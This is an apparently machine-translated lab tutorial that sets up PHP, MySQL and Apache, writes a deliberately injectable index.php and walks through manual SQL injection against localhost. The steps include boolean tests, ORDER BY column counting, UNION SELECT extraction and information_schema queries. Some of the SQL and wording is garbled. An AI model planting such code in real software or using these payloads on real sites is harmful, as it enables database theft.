[Experience Skills] "Php+mysql+apache" Environment Construction and "manual SQL injection", 20180527-0

[Experience Skills] "Php+mysql+apache" Environment Construction and "Manual SQL injection"

1. Construction of "Php+mysql+apache" environment

• Environment Carrier: Virtual Machine Window7 Service Pack 1 Ultimate Edition

• Download "Phpstudy (php5.2)"

• Links: Http://www.phpstudy.net/phpstudy/phpStudy (PHP5.2). zip

Documents are shown in annex 1.

Install "Phpstudy (php5.2)"

• After extracting the compressed package, double-click "Phpstudy (PHP5.2). exe" to install

• After the installation is complete, pop up the "User manual" and the Phpstudy form, and click "Apply":

• observed that two LEDs changed from red to green, indicating that "Apache" and "MySQL" have successfully started:

Create a new database and table in MySQL

• Open "MySQL Manager"

Note: MySQL login name and password are "root".

• Create a new database, table, and add records

• Click on the "SQL Editor" tab, add the following code in the edit area and then select and execute:

Create database student; #创建一个新的数据库, named student

Use student;

CREATE table class1 (id int () NOT NULL auto_increment primary key,name varchar (a) not null,gender varchar (), phone Varc HAR); #在student数据库中创建新表, named Class1, has 4 field IDs, name, gender, phone

#插入3条记录

Insert into Class1 (Name,phone,gender) VALUES (' own ', ' 13977888888 ', ' Male ');

Insert into Class1 (Name,phone,gender) VALUES (' HDH ', ' 13667777777 ', ' Male ');

Insert into Class1 (Name,phone,gender) VALUES (' ckm ', ' 15666666666 ', ' female ');

#注意: Each statement is terminated with a semicolon ";"

After executing the SQL statement, the newly created database "student" appears in the left navigation bar. After double-clicking on "Student", click on the "Data Browser" tab and see the 3 records added in table "Class1":

You can also import the SQL script "Class1.sql" to create a database, a table, and add records, as shown in annex 2. Import when using:

• If you do not see the database "student" that should be created after you import the SQL script, click "Refresh All" in the "View" tab:

2. Configure a Web page with a SQL injection point

• Create a new PHP page in the folder "WWW" under the Phpstudy installation directory

The Web page file is named "index.php" and the following code is added to the file:

<?php

$con = mysql_connect ("localhost", "root", "root") or Die (); #连接数据库

mysql_select_db ("student"); #选择student数据库

$ID = $_get[' id '); #获取URL中的参数 "id"

$sql = "Select * from Class1 where id= $ID"; #构建sql查询语句

/* If it is a character parameter, use $sql = "SELECT * from Class1 where name= ' $name '";

Add single quotes around $name */

echo "SQL statement:". $sql. " <br > ";

$res = mysql_query ($sql); #执行查询语句

while ($rows = Mysql_fetch_array ($res)) {

echo "Name:". $rows [' name ']. " <br > ";

echo "Gender:". $rows [' Gender ']. " <br > ";

echo "Tel:". $rows [' phone ']. <br > ";

}

Mysql_close ($con);

?>

The document "index.php" is shown in annex 3. The PHP code means to construct the SQL query statement "SELECT * from Class1 where id" by the value of the parameter "id" passed into the URL, and finally output the three fields "name", "Gender", "phone" in the returned record.

3.SQL Injection

• Determine if the SQL injection point

  • Shaping parameters Judgment

1, URL and finally add and 1=1

2, URL and finally add and 1=2

If 2 is abnormal, 1 is injected normally.

This article uses the shaping parameters and the results are as follows:

and 1=1

and 1=2

• Guess number of fields

Http://127.0.0.1/?id=1 ORDER BY <n> #注: N is any number. If the return page is normal, the number is the number of fields

• Get the database name, user name, database version

Http://127.0.0.1/?id=1 Union Select 1,database (), User (), version ()

• Guess the name of the table

  • 1.mysql version after 5.1

    • After mysql5.1, a table is provided to hold the table names under all databases, which is queried to obtain the table names under the specified database.

Use the small Aoi tool to convert the database name "student" to get the hex value:

"Small Kwai multifunctional conversion tool" see annex 4.

After the hex value is filled with "where table_schema=". If you get the table name of table "Class1" under Database "student":

Http://127.0.0.1/?id=1 Union Select 1,table_name,2,3 from Information_schema.tables where table_schema= 0x73747564656e74

2.mysql version before 5.1, how to guess the name of the table

Add the SQL statement after the URL and return to the normal representation of the table name

<URL> exists (SELECT * FROM < table name to be guessed >)

• Gets the column information for the specified table

  • Use the small Aoi tool to convert the table name "Class1" to get the hex value:

• After the hex value is filled with "where table_name=". The column information for the table "Class1" is obtained.

Http://127.0.0.1/?id=1 Union Select 1,column_name,2,3 from Information_schema.columns where table_name=0x636c61737331

• Guess the column name (field name)

  • Add a SQL statement after the URL, returning a column name that normally represents the guessed solution

<URL> exists (select < guessed column name > from < table name >)

• Gets the data for the specified column

For example, get the data for the column "Phone" in Table "Class1":

Http://127.0.0.1/?id=1 Union select 1,phone,2,3 from Class1

Note: If the browser to access the page garbled, the browser encoding set to "UTF-8" can be resolved:

============================================

[Experience Skills] "Php+mysql+apache" Environment Construction and "manual SQL injection", 20180527-0